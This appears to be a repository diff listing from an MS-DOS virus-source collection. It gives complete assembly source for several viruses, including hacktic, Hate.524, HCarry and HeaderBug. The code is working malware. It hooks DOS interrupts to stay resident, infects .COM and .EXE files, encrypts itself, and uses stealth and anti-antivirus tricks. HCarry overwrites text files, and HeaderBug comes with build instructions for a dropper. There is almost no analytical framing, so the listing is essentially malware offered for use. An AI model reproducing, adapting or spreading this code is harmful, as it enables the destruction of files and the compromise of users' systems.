stosb
pop di ;RETREIVE POINTER TO EXT
pop es ;RESTORE ES FOR EXEC
pop ax ;GET FUNCTION
push ax ;KEEP IT
push dx ;KEEP POINTER TO PROCESS NAME
pushf ;DO INTERRUPT
push cs
call interrupt
mov ax,'OC' ;CHANGE EXT TO COM
stosw
mov al,'M'
stosb
pop dx ;CLEAR STACK
pop ax
jc interrupt ;WASN'T .EXE SO JUST CONTINUE
mov cx,2
mov ah,3ch ;CREATE SHADOW .COM FILE
int 21h
xchg bx,ax ;GET HANDLE
push cs ;WRITE VIRUS TO .COM FILE
pop ds ;SEGMENT OF VIRUS CODE
mov cl,len
mov dx,si ;=0100 HEX
mov ah,40h ;WRITE VIRUS AND EXIT
;
interrupt:
db 0eah ;FAR JUMP
int21: ;VECTOR GOES HERE
;
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

83
MSDOS/Virus.MSDOS.Unknown.hack-res.asm Normal file
View File

@ -0,0 +1,83 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset int21-100h ;LENGTH OF VIRUS CODE
;
start: mov ax,9000h ;MOVE VIRUS CODE UP
mov es,ax
mov di,si
mov cx,len
rep movsb
mov ds,cx ;DS = 0
mov si,84h ;INT 21 VECTOR
mov di,offset int21
push di
mov dx,offset infect
lodsw ;SAVE ORIGINAL VECTOR
cmp ax,dx ;VIRUS PROBABLY ALREADY RESIDENT
je exit
stosw
lodsw
stosw
push es
pop ds
mov ax,2521h ;REVECTOR TO VIRUS
int 21h
exit: push cs ;RESTORE SEGMENT REGISTERS
pop ds
push cs
pop es
pop si ;SI = END OF VIRUS CODE
mov di,0fch
push di ;RETURN HERE
mov ax,0aaach ;LODSB/STOSB INSTRUCTIONS
stosw
mov ax,0fce2h ;LOOP TO ADDRESS INSTRUCTIONS
stosw
mov ch,0feh
ret ;MOVE CODE AND RUN PROGRAM
;
infect: pushf
push ax
push cx
push dx
push si
push ds
cmp ah,40h ;WRITE FUNC?
jne done
cmp bx,1
je mes
mov si,dx ;DS:DX = WRITE BUFFER
lodsb
cmp al,0b8h ;ALREADY INFECTED?
je done
cmp al,0ebh ;PROBABLY .COM
jne done
mov cx,len ;LENGTH OF VIRUS
mov dh,1 ;DX ASSUMED TO BE 0
hack: push cs
pop ds
pushf
call cs:[int21] ;WRITE VIRUS
done: pop ds
pop si
pop dx
pop cx
pop ax
popf ;CONTINUE INTERRUPT
jmp cs:[int21]
mes: mov cx,12
mov dx,offset string
jmp short hack
string db ' (H*ck-tic) '
;
int21 dd 0c3h ;STANDALONE VIRUS RETURNS
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

70
MSDOS/Virus.MSDOS.Unknown.hacktic.asm Normal file
View File

@ -0,0 +1,70 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
len equ offset last-100h
start: mov si,0100h
push si
mov ax,cs
add ah,10h
mov es,ax
xor di,di
mov cx,len
rep movsb
mov dx,0FE00h
mov ah,1Ah
int 21h
mov dx,offset file
mov ah,4Eh
jmp short find
retry: mov ah,3Eh
int 21h
mov ah,4Fh
find: push cs
pop ds
int 21h
mov cx,0FE1Eh
jc nofile
mov dx,cx
mov ax,3D02h
int 21h
xchg ax,bx
push es
pop ds
mov dx,di
mov ah,3Fh
int 21h
add ax,len
cmp byte ptr [di], 0BEh
je retry
push ax
xor cx,cx
mov ax,4200h
cwd
int 21h
pop cx
mov ah,40h
int 21h
jmp short retry
nofile: push cs
pop es
mov bl,0FCh
mov [bx],0AAACh
mov [bx+2],0FCE2h
pop di
push bx
ret
file db '*.COM',0
last db 0C3h
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

63
MSDOS/Virus.MSDOS.Unknown.hacktic2.asm Normal file
View File

@ -0,0 +1,63 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset last-100h ;LENGTH OF VIRUS CODE
;
start: mov bx,0fh ;KLUDGE TO AVOID MEMALLOC ERROR
mov ah,4ah
int 21h
mov dx,es
add dh,10h
mov es,dx ;PROGRAM CODE WILL RUN HERE
push dx ;SET UP FOR FAR RETURN
push si
mov ah,26h ;CREATE NEW PSP
int 21h
mov di,si
mov si,offset last
push si
mov ch,0feh
rep movsb ;MOVE PROGRAM CODE UP
dec cx ;=FFFF
pop di
mov dx,offset file
mov ah,4eh ;FIND FIRST .COM FILE
jmp short find
retry: mov ah,4fh ;FIND NEXT
find: int 21h
jc nofile ;NO (MORE) FILES
mov dx,9eh ;FILE NAME IN DTA
mov ax,3d02h ;OPEN FILE
int 21h
xchg ax,bx ;1-BYTE MOVE OF AXBX
mov dx,di ;END OF VIRUS CODE
mov ah,3fh ;READ FILE DATA (CX=FFFF)
int 21h ;READ FILE AFTER VIRUS CODE
add ax,len ;LENGTH OF VIRUS+FILE
cmp byte ptr [di],0bbh ;CHECK IF ALREADY INFECTED
je retry ;TRY AGAIN
push ax
xor cx,cx
mov ax,4200h ;RESET FILE POINTER
cwd ;DX=0
int 21h
pop cx
mov dh,1
mov ah,40h ;WRITE INFECTED CODE BACK
int 21h
;
nofile: push es ;GO RUN PROGRAM
pop ds
retf
;
file db '*.COM',0 ;SEARCH FOR .COM FILES
last db 0c3h ;STANDALONE VIRUS CODE JUST RETURNS
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

5548
MSDOS/Virus.MSDOS.Unknown.hare.asm Normal file
View File

File diff suppressed because it is too large Load Diff

299
MSDOS/Virus.MSDOS.Unknown.hate.asm Normal file
View File

@ -0,0 +1,299 @@
; Hate.524 (named by Moi because of Internal Text and Size)
; Uninteresting Encrypted COM Infector
; Source code compliments of PakiLad
p386n
seg000 segment byte public 'CODE' use16
assume cs:seg000
org 100h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
start proc near
and al, 21h
mov ax, 5800h
int 21h ; Virus Installation Check
cmp ah, 58h ; Installed Already?
jnz InstallVirus ; No? Then JMP.
mov ah, 4Ch
int 21h ; Exit To DOS
InstallVirus:
call $+3
start endp
Next proc near
pop si
sub si, offset Next
mov dl, Cryptor[si]
cmp dl, 0
jz Crypted
mov cx, VirusSize
lea di, Crypted[si]
DecryptLoop:
mov al, [di]
xor al, dl
mov [di], al
inc di
loop DecryptLoop
Crypted:
mov ah, 14h
int 21h ; Install Check
cmp ah, 6 ; Installed?
jz RestoreCOM ; Yes? Then JMP.
jmp short DoInstall
RestoreCOM:
push cs
pop ds
mov ax, OrgByte1[si]
mov word ptr start, ax
mov ax, OrgByte2[si]
mov word ptr ds:102h, ax
mov al, OrgByte3[si]
mov byte ptr ds:104h, al
mov ax, offset start
push ax
retn ; Return to Original Program
DoInstall:
mov ah, 52h
int 21h ; Get List Of Lists
mov bx, es:[bx-2]
FindLastMCB:
mov es, bx
add bx, es:3
inc bx
cmp byte ptr es:0, 'Z' ; Last MCB?
jnz FindLastMCB ; No? Then JMP.
mov ax, es
mov es, bx
cmp byte ptr es:0, 'M' ; More MCB To Follow?
jz GotMoreMCB ; Yes? Then JMP.
mov es, ax ; ES points to MCB
jmp short GotMemory
GotMoreMCB:
mov es, bx
add bx, es:3
inc bx
cmp byte ptr es:0, 'M'
jz GotMoreMCB
GotMemory:
mov bx, es:3
mov ax, 795
mov cl, 4
shr ax, cl
sub bx, ax
mov es:3, bx
mov ax, es
add bx, ax
xor di, di
mov es, bx
mov cx, TotalSize+100h
push si
rep movsb ; Copy Virus Into Memory
pop si
push es
pop ds
mov ax, 3521h
int 21h ; Get Int 21h Vectors
mov Int21Ofs, bx
mov Int21Seg, es
mov ah, 25h
mov dx, offset NewInt21
int 21h ; Set New Int 21h Vectors
jmp RestoreCOM
Next endp
NewInt21: ; Install Check?
cmp ah, 14h
jnz CheckExecute ; No? Then JMP.
mov ah, 6 ; I'm Here!
iret
CheckExecute: ; Set Execution State?
cmp ah, 4Bh
jnz CheckFCBFind ; No? Then JMP.
jmp short InfectFile
CheckFCBFind: ; Find First File (FCB)?
cmp ah, 11h
jz FindFileFCB ; Yes? Then JMP.
cmp ah, 12h ; Find Next File (FCB)?
jnz DoOriginalFunc ; No? Then JMP.
FindFileFCB:
call CallInt21
pushf
pusha
push es
cmp al, 0 ; None found?
jnz NoFilesFound ; No? Then JMP.
mov ah, 2Fh
call CallInt21 ; Get DTA Segment/Offset
cmp byte ptr es:[bx], 0FFh ; Extended FCB?
jnz NotExtFCB ; No? Then JMP.
add bx, 7
NotExtFCB:
mov al, es:[bx+17h]
and al, 1Fh
cmp al, 1Fh ; Infected Already?
jnz NoFilesFound ; No? Then JMP.
sub word ptr es:[bx+1Dh], TotalSize ; Fix FileSize
NoFilesFound:
pop es
popa
popf
iret
DoOriginalFunc:
jmp short $+2
JMPFar21 db 0EAh
Int21Ofs dw 0
Int21Seg dw 0
InfectFile:
pusha
push es
push ds
mov ax, 3D02h
call CallInt21 ; Open File
jnb FileOpened ; No problems? Then JMP.
jmp CloseFile
FileOpened:
xchg ax, bx
push cs
pop ds ; DS = CS
mov ah, 3Fh
mov cx, 5
mov dx, offset OrgByte1
call CallInt21 ; Read In 5 Bytes
mov ax, OrgByte1
add ah, al
cmp ah, 0A7h ; Infected Already?
jnz NotBad1 ; No? Then JMP.
jmp CloseFile
NotBad1: ; Infected Already?
cmp ah, 45h
jnz NoSigFound ; No? Then JMP.
jmp CloseFile
NoSigFound:
mov ax, 5700h
call CallInt21 ; Get File Date/Time
push cx
push dx
and cx, 1Fh
cmp cx, 1Fh ; Infected Already?
jnz MovePtrEnd ; No? Then JMP.
pop dx
pop cx
jmp short CloseFile
MovePtrEnd:
mov ax, 4202h
xor cx, cx
cwd
call CallInt21 ; Move Pointer to End of File
sub ax, 3 ; Calculate JMP Offset
mov JMPOffset, ax
mov ah, 40h
mov cx, CryptSize
mov dx, offset start
call CallInt21 ; Write Crypt Routine to File
mov cx, VirusSize
mov si, offset Crypted
mov di, offset EndOfVirus
mov ax, 8F20h
push es
push ax
pop es
assume es:nothing
in al, 40h ; Get Random Number
xchg al, dl
mov Cryptor, dl
EncryptVirus:
mov al, [si]
xor al, dl
mov es:[di], al
inc si
inc di
loop EncryptVirus
mov cx, 1
EncryptSecond:
mov al, [si]
mov es:[di], al
inc si
inc di
loop EncryptSecond
pop es
assume es:nothing
push ds
mov ax, 8F20h
push ax
pop ds
assume ds:nothing
mov ah, 40h
mov cx, VirusSize2
mov dx, offset EndOfVirus
call CallInt21 ; Write Encrypted Virus To File
pop ds
assume ds:seg000
mov ax, 4200h
xor cx, cx
cwd
call CallInt21 ; Move Pointer to Beginning
mov ah, 40h
mov cl, 5
mov dx, offset InfMarker
call CallInt21 ; Write JMP And Infection Marker
pop dx
pop cx
or cx, 1Fh
mov ax, 5701h
call CallInt21 ; Fix File Date/Time
CloseFile:
mov ah, 3Eh
call CallInt21 ; Close File
pop ds
pop es
popa
jmp near ptr JMPFar21
CallInt21 proc near
pushf
call dword ptr cs:Int21Ofs
retn
CallInt21 endp
OrgByte1 dw 2124h
OrgByte2 dw 20CDh
OrgByte3 db 0
InfMarker dw 2124h
JMPInstruction db 0E9h
JMPOffset dw 0
VirusName db 'THIS IS [HATE V1.0] VIRUS$'
Cryptor db 0
EndOfVirus:
CryptSize equ Crypted - start
VirusSize equ Cryptor - Crypted
VirusSize2 equ $ - Crypted
TotalSize equ $ - start
seg000 ends
end start

325
MSDOS/Virus.MSDOS.Unknown.hause.asm Normal file
View File

@ -0,0 +1,325 @@
_attr_ equ 0
_date_ equ 2
_time_ equ 4
fil equ 6
mov ax,4245h ;sepuku!
int 21h
jmp short jump1
db 'DY'
dy equ $-2-100h
_size dw offset total-100h
_ofs dw offset total
db 'McAfee, geht nach Hause! Wir sind un<75>berwindlich!'
jump1:
mov ax,3521h
int 21h
mov old21[0],bx
mov old21[2],es
mov ax,cs
dec ax
mov ds,ax
lodsb
cmp byte [0],'Z'
jne bee_bloop_blap
cmp word ptr [0003h],pgf
jc bee_bloop_blap
sub word ptr [0003h],pgf
sub word ptr [0012h],pgf
mov es,[0012h]
mov si,110h
mov di,si
sub di,10h
mov cx,total-100h
rep movsb
push es
pop ds
cli
mov ax,2521h
mov dx,offset swansich
int 21h
sti
jmp 100h
bee_bloop_blap:
int 24h
int 20h
st21 db 0
vier:
mov al,0
iret
swansich:
pushf
cmp ax,4245h
jne not_sepuku
cmp word [dy+100h],'YD'
jne not_sepuku
popf
push bp
mov bp,sp
mov ds,[bp+4]
pop bp
mov si,word _ofs
mov cx,word _size
mov di,100h
push ds
pop es
cld
bam: rep movsb
pop ax
mov ax,100h
push ax
call zero_regs
iret
olr dw 0,0
not_sepuku:
cmp ah,40h
jne exec
cmp bx,5
jb exec
cmp cx,16
jl exec
call push_all
mov di,dx
add di,cx
dec di
mov al,[di]
mov bl,[di-1]
mov [di-1],al
mov [di],bl
call pop_all
exec:
cmp ax,4B00h ;exec
jne back
cmp cs:st21,0
jne back
mov cs:st21,1
call push_all
xchg si,dx
mov di,fil
push cs
pop es
mov cx,128
cld
rep movsb
call pop_all
popf
call o21
pushf
call push_all
mov ax,3524h
call o21
push bx
push es
mov ah,25h
push ds
push cs
pop ds
push dx
mov dx,offset vier
call o21
pop dx
pop ds
push cs
pop ds
mov dx,fil
mov ax,4300h
call o21
mov cs:[_attr_],cx
mov ax,4301h
xor cx,cx
call o21
jc err1
call infect
mov ax,4301h
mov cx,cs:[_attr_]
call o21
err1: pop ds
pop dx
mov ax,2524h
call o21
mov cs:st21,0
call pop_all
popf
retf 2
back: mov cs:st21,0
popf
jfa: db 0EAh
old21 dw 0,0
o21: pushf
call dword ptr cs:[old21]
ret
zero_regs:
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
ret
jmp_to dw 0
push_all:
pop cs:[jmp_to]
push bp
push ds
push es
push di
push si
push dx
push cx
push bx
push ax
jmp cs:[jmp_to]
pop_all:
pop cs:[jmp_to]
pop ax
pop bx
pop cx
pop dx
pop si
pop di
pop es
pop ds
pop bp
jmp cs:[jmp_to]
;|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
; infection routine
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
infect:
pushf
call push_all
mov ax,3D02h
call o21
jnc open
i_back:
call pop_all
popf
ret
open:
xchg bx,ax
push cs
pop ds
push cs
pop es
mov ax,5700h
call o21
mov [_date_],dx
mov [_time_],cx
mov ah,3Fh
mov cx,offset total-100h
mov dx,offset total
call o21
jnc read1
jcls1: jmp close
read1: cmp ax,cx
jne jcls1
cmp word ptr [offset total],'ZM'
je jcls1
cmp byte ptr [offset total],'Z'
je jcls1
cmp word ptr [offset total+dy],'YD'
je jcls1
mov ax,4202h
xor cx,cx
xor dx,dx
call o21
jc jcls1
cmp dx,0
jne jcls1
cmp ah,0F1h
ja jcls1
add ax,100h
mov _ofs,ax
mov ah,40h
mov dx,offset total
mov cx,offset total-100h
call o21
jc jcls1
cmp ax,cx
jne jcls1
mov ax,4200h
xor cx,cx
xor dx,dx
call o21
mov ah,40h
mov cx,offset total-100h
mov dx,100h
call o21
and byte [_time_],255-31
or byte [_time_],29
close:
mov ax,5701h
mov cx,[_time_]
mov dx,[_date_]
call o21
mov ah,3Eh
call o21
jcls2: jmp i_back
db 'Demoralized Youth vous a eu'
total:
pgf equ $/16*2
db 'Í '


137
MSDOS/Virus.MSDOS.Unknown.hcarry.asm Normal file
View File

@ -0,0 +1,137 @@
;This is the HCarry Virus
;dedicated to the late Harry Carry
;The only AV scanner that I know of that detects this virus is TBAV Scanner
start: ;start of virus!
lea si, crypt_start
mov di,si
mov cx,end - crypt_start
call crypt
jmp crypt_start
xor_value db 0
crypt:
lodsb
xor al,byte ptr [xor_value]
stosb
loop crypt
ret
crypt_start:
mov ah,9 ;print string to screen
lea dx,textmask
int 21h ;go do it dos!
mov ax,0fa02
push ax
mov bl,0
mov dx,05945
push dx
int 016
push cx
mov ah,4eh ;find first file
lea dx,filemask ;put the kind of file we want to find first in dx
xor cx,cx ;clears the cx register to 0
find_next: ;label for the find next rountine
int 21h ; go do it!
jnc infect ;jump if a file is found, if not continue jnc=jump
jmp text ;if carry flag isn't set
infect: ;here is our infect rountine, where we go when we find a file to kill
mov ax,3d02h ; open file for read/write access (00=read
;01=write 02=read/write)
mov dx, 9eh ;get file info
int 21h ;now!~
mov bx,ax ;move info form bx register in ax
in al,40h
mov byte ptr [xor_value],al
mov ah,40h
lea dx,start
mov cx,crypt_start - start
int 21h
lea si,crypt_start
lea di,end
mov cx,end - crypt_start
call crypt
mov ah,40h ;40hex write to file
mov cx,end - crypt_start ; heres the length of what we want to write
lea dx,end ;and heres where to start
int 21h ; go!
mov ah,3eh ;close the file up
int 21h ;now!
mov ah,4fh ;find next file!
jmp find_next ;continue!
text:
mov ah,4eh
lea dx,textfile
int 21h
jnc text_pload
jmp close
text_pload:
mov ax,3d02h
mov dx,9eh
int 21h
mov ah,40h
mov cx,pload_end - pload_start
lea dx,pload_start
int 21h
jmp text_findnext
text_findnext:
mov ah,4fh
int 21h
jnc text_pload
jmp close
pload_start:
db 'HOLY COW!',10,13,
db '---',10,13,
db 'Whats your favorite planet?...Mines the SUN!',10,13,
db 'One time i studied it for a whole hour i almost went BLIND!',10,13,
db '---',10,13,
db 'Hey!....Whats goin.....Hey!',10,13,
db '---',10,13,
db 'Now just for some silly crap!',10,13,
db 'FLOCK!',10,13,
db 'Hehehehe Look At YOU!',10,13,
db 'Back to the Computer Store for you!',10,13,
db 'This is HORRRIBLE!'
db 'Who would do something like this?',10,13,
db 'MY LEG DOESNT BEND THAT WAY!',10,13,
db 'MOCB',10,13,
db 'This Virus has infected this file if you havnt found that out yet!',10,13,
db 'Please insert 25 cents!',10,13,
db 'DO DO DO Were Sorry your call did not go threw please hang up and try again',10,13,
db 'JERRY JERRY JERRY JERRY JERRY JERRY',10,13,
db 'Jerry Springer to HOT for Television',10,13,
db 'DOH!',10,13,
pload_end:
close:
int 20h ;exit program
;this next portion is the datasegment which the virus refers to for
;the variable we give it
;Thank you to Spo0ky,<-OPIC->,and Arsonic for helping me!
textfile db '*.txt',0 ;find .txt files
filemask db '*.com',0 ;the kinds of files we want
textmask db 'This file is now infected!',10,13,
db 'By The HCarry virus!',10,13,
db 'MoCBDUKE[Codebreaker, 1998]',10,13,'$'
end:

288
MSDOS/Virus.MSDOS.Unknown.headbug.a86 Normal file
View File

@ -0,0 +1,288 @@
;=============================================================================
; Virus Name: HeaderBug
; Effective Length: 324 Bytes (no increase in file length)
;
; Notes:
; - resident, BIOS-level-stealth .EXE header infector
; - undetectable by any current A-V scanner even w/o stealth
; - infects SMARTDRV.EXE to ensure residency at each boot
; - infects .EXE header sectors whenever accessed for write
; OR read (during reads only if A-V monitor is not
; resident)
; - As a result, will infect every target .EXE file during
; even such operations as a fixed disk DEFRAG
; - successfully infects Windows .EXE files without
; detection even when 32-bit file access is in use
; - does not decrease available memory
; - no harmful payload
;
; To Compile:
; - use shareware A86 assembler
; - type "a86 headbug.a86"
; - resulting headbug.com is actually an .exe file.
; It is a virus dropper which, if executed, will infect
; your system with HeaderBug
;=============================================================================
start_offset equ 07d*4-1
res_offset equ start_offset-01a0
com_offset equ 0100
header_offset equ 01a0
infect_tag equ 0c033
setver_tag equ 0d4a
viruslength equ 0144
old_code_length equ 012
EH_Signature dw 'ZM' ;set to 'MZ' or 'ZM' for .exe files
EH_Modulo dw 0000 ;remainder of file size/512
EH_Size dw 0012 ;file size/512
EH_Reloc dw 0000 ;6 ;number of relocation items
EH_Size_Header dw 000a ;8 ;size of header in paragraphs
EH_Min_Mem dw 0240 ;minimum paragraphs needed by file
EH_Max_Mem dw 0240 ;maximum paragraphs needed by file
EH_SS dw 0240 ;stack segment displacement
EH_SP dw ? ;stack pointer
EH_Checksum dw ? ;checksum, not used
EH_IP dw 0000 ;14 ;instruction Pointer of Exe file
EH_CS dw 0000 ;16 ;code segment displacement of .exe
EH_1st_reloc dw ? ;first relocation item
EH_ovl dw ? ;overlay number
db 084 dup ? ;pad rest of header w/dummy bytes
;-----------------------------------------------------------------------------
; Header_entry - Tests interrupt vector table for room and if there is room,
; installs virus in unused area of interrupt table. Read and write disk
; cache on all drives are disabled (prevents infection problems), SMARTDRV
; infected in default directory to ensure that virus becomes resident on each
; boot and that SMARTDRV's disk cache is never installed. SMARTDRV is
; infected through read-file action (not write) by installed int13 routine.
;-----------------------------------------------------------------------------
header_entry:
xor ax,ax ;set ax=0
mov ds,ax ;set ds=ax
mov es,ax ;set es=ax
dec ax ;set ax=ffffh as flag for zero_test
mov si,start_offset ;set si to start address in INT table
push si ;save value for later use
call zero_test ;check for clear area in INT table
pop di ;set destination offset to INT table
jc exit_header ;if area not clear, exit, don't install
xor si,si ;set source offset to virus start
call move_it ;move virus to empty space in INT table
mov di,offset old13+res_offset ;set destination for int13
mov si,013*04 ;set source for int13 vector
push si ;save value for later use
movsw ;copy int13 vector
movsw
pop di ;set destination for new value
mov ax,offset int13+res_offset ;virus int13 routine offset
stosw ;store new offset in int13
xor ax,ax ;virus int13 routine segment
stosw ;steal int13
mov bx,03 ;value required for STATUS call
mov bp,05 ;set max. number of drives
kill_cache:
mov ax,04a10 ;SMARTDRV STATUS function
push ax ;save it for later use
mov dl,02 ;turn off drive's read buffer
int 02f ;do it
pop ax ;restore ax
mov dl,04 ;turn off drive's write buffer
int 02f ;do it
dec bp ;decrement drive number
jns kill_cache ;if drive number >=0, repeat process
push cs
pop ds ;set ds=cs
mov ax,03d00 ;open file w/handle
mov dx,offset filename-header_offset ;point to filename
int 021 ;do it
jc exit_header ;if flag=fail, exit
mov bx,ax ;save handle
mov ah,03f ;read file w/handle
mov ch,02 ;read 200h bytes (header sector)
mov dh,02 ;point to buffer area beyond virus
int 021 ;do it (infect SMARTDRV.EXE header)
mov ah,03e ;close file w/handle
int 021 ;do it
exit_header:
mov ah,04c ;terminate with return code
int 021 ;do it
filename: db 'C:\DOS\SMARTDRV.EXE',0 ;file to initially infect
;-----------------------------------------------------------------------------
; Int13 - On any read or write, checks sector for .EXE header characteristic.
; Checks for word found in header of SETVER.EXE to prevent infection and
; resulting problems (lockup) when an infected SETVER is loaded from default
; CONFIG.SYS. If sector is being read, checks for infection then checks for
; presence of A-V monitor before infecting. If sector is being written, only
; checks for SETVER header, since stealth on prior int13 would hide previous
; infection and since any A-V monitor would expect a write action. In both
; read or write cases, sector is restored to appear identical to pre-infection
; before buffer containing .EXE header is presented to calling program. Name
; of virus stored in area of interrupt table used by TBDriver vectors in
; order to prevent system crash if TBDriver is loaded after virus is resident.
;-----------------------------------------------------------------------------
int13:
push cx ;preserve registers
push si
push di
push ds
push es
pop ds ;set ds=es
cmp ah,03 ;write operation?
je write ;if so, jump to write routine
cmp ah,02 ;read operation?
jne chain_old_int13 ;if not, exit
read:
pushf
call far cs:[offset old13+res_offset] ;call int13 (read sector)
jc exit_int13 ;if flag=fail, exit
mov si,'ZM' ;bytes indicating .EXE header
cmp [bx],si ;.EXE header?
jne exit_fail ;if not, exit
cmp [bx+014],setver_tag ;is this SETVER's header?
je exit_fail ;if so, exit
cmp [bx+0a0],infect_tag ;already infected?
je disinfect ;if so, jump to stealth routine
push ds ;preserve ds
xor di,di ;set di to virus destination
mov ds,di ;set ds to point to INT vector table
cmp byte ptr [040*4+3],0f0 ;int40 still pointing at ROM?
pop ds ;restore ds
jb exit_fail ;if not pointing at ROM, A-V monitor
; present, so exit
push cx ;preserve cx
call infect ;infect header in buffer
pop cx ;restore cx
jc exit_fail ;if flag=fail, exit
mov ax,0301 ;write infected header buffer
pushf
call far cs:[offset old13+res_offset] ;do it (call original int13)
disinfect:
lea si,[bx+offset old_header-com_offset] ;set source for code
lea di,[bx+06] ;set destination
mov cx,old_code_length ;set length of old code to restore
cld ;move direction=forward
rep movsb ;restore original code to header
xor al,al ;set al=0
mov cx,viruslength+old_code_length ;set # bytes to overwrite
lea di,[bx+0a0] ;set destination for writes
rep stosb ;overwrite viral code with zeros
exit_fail:
clc ;clear carry to hide any I/O errors
exit_int13:
pop ds ;restore registers
pop di
pop si
pop cx
retf 02 ;return to calling program
tbdriver_vector_area:
db '=HeaderBug=' ;space filler for TBDriver vector
write:
mov si,'ZM' ;bytes indicating .EXE header
cmp [bx],si ;.EXE header?
jne chain_old_int13 ;if not, exit
cmp [bx+014],setver_tag ;is this SETVER's header?
je chain_old_int13 ;if so, exit
push ax ;preserve ax
call infect ;infect header in buffer
pop ax ;restore ax
chain_old_int13:
pop ds ;restore registers
pop di
pop si
pop cx
db 0ea ;"jump far"
old13:
dw 02 dup ? ; to address of orig. int13 routine
infect:
lea si,[bx+0a0] ;set si=source offset for virus code
zero_test:
mov cx,viruslength+old_code_length ;set scan count to virus length
cld ;set direction of scan=forward
test_byte:
lodsb ;load a byte from area to be scanned
or al,al ;check for zero
loopz test_byte ;if zero, check next byte
or cx,cx ;counted down to zero w/o prior exit?
jz infect_OK ;if so, area is clear to infect
stc ;set "clear-to-infect" flag
ret ;return to calling routine
infect_OK:
inc ah ;increment ah
jz exit_infect ;true if calling routine=header_entry
mov cl,old_code_length ;length of old header code to preserve
lea si,[bx+06] ;set source for old code
lea di,[bx+offset old_header-com_offset] ;set storage destination
rep movsb ;store old code in virus
xor ax,ax ;set ax=0
lea di,[bx+014] ;set destination to cs:ip location
stosw ;set cs:ip values in header to 0:0
stosw ; by storing zeros in their locations
lea di,[bx+06] ;set destination to # of reloc. items
stosw ;set # of relocation items to zero
mov al,0a ;set header size value to 0ah to
stosw ; place entry point at start of virus
mov si,start_offset ;set si=start offset of virus
lea di,[bx+0a0] ;set di=destination offset in buffer
move_it:
push ds ;preserve ds
push cs
pop ds ;set ds=cs
mov cx,viruslength ;set cx move count to length of virus
cld ;set direction of move to forward
rep movsb ;move virus to header in buffer
pop ds ;restore ds
exit_infect:
clc ;clear flag to hide any I/O errors
ret ;return to calling routine
old_header:
db old_code_length dup ? ;storage area for original header
; contents
dummy_bytes:
db 0220a dup ? ;dummy bytes used to increase dropper
; length to avoid detection by f-prot

296
MSDOS/Virus.MSDOS.Unknown.heevahav.asm Normal file
View File
